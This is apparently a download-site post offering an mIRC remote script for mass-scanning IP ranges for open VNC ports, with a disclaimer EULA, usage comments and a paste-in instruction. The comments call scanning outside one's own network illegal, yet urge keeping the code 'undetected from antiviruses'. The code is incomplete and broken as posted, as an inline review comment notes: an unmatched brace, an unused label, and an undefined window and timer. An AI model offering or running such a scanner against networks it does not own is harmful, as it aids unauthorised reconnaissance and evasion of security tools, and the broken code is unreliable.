    3. The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA).

    4. The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third part instances that may use this software for any illegal or nefarious activities.

    Download

    Source

  15. ;Copy code into your mIRC remote scripts
    ;Syntax is /rvnc <ip.ip.ip.ip> <port>
    ;ex: /rvnc 192.168.0.0 5900
    ;above command will scan from 192.168.0.0 to 192.255.255.255 then halt.
    ;Illegal if you decide to scan IP addresses not in your network
    ;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!!

    ; Socket-open handler for sockets named vncscan*: on a connection error
    ; ($sockerr set) it simply returns; on success nothing further is done here.
    on *:sockopen:vncscan*:{
    if ($sockerr) { return }
    }
    ; Socket-read handler for vncscan* sockets: reads the reply into the binary
    ; variable &vnc, returns when nothing was read ($sockbr == 0), otherwise
    ; announces the halt in window @vnc, turns the RANGE timer off and halts.
    ; NOTE(review): as posted the snippet is incomplete — the ":nextread" label
    ; is never jumped to, neither the @vnc window nor the RANGE timer is created
    ; anywhere here, and the trailing "halt }" on the echo line already closes
    ; the handler, leaving the final "}" unmatched.
    on *:sockread:vncscan*:{
    :nextread
    sockread &vnc
    if ($sockbr == 0) return
    echo @vnc VNC Scan halted. | .timerRANGE off | halt }
    }

    press Alt + R and paste

    source: secret-zone.net
